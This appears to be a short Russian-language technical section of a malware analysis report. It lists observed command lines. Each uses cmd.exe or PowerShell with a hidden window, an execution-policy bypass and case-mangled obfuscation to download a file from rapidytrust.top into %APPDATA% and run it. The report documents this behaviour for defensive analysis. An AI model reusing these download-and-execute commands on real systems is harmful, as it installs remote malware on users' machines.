Техническая информация
- '<SYSTEM32>\cmd.exe' /C "PoWeRsHELl.Exe -EXeCUtIOPolicY ByPasS -OpRoFilE -wINdOWStYLE HiddeN (NeW-oBjECt SYsTem.NeT.WEBcLieT).DOWlOaDfiLE('http://rapidytrust.top/search.php','%apPdAtA%.EXe');sTArt-PrOcE...
- '<SYSTEM32>\cmd.exe' /C "PoWeRsHELl.Exe -EXeCUtIOPolicY ByPasS -OpRoFilE -wINdOWStYLE HiddeN (NeW-oBjECt SYsTem.NeT.WEBcLieT).DOWlOaDfiLE('http://rapidytrust.top/search.php','%apPdAtA%.EXe');sTArt-PrOcE...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EXeCUtIOPolicY ByPasS -OpRoFilE -wINdOWStYLE HiddeN (NeW-oBjECt SYsTem.NeT.WEBcLieT).DOWlOaDfiLE('http://rapidytrust.top/search.php','%APPDATA%.EXe');sTArt-PrOcESS '%APPDATA%.eXe'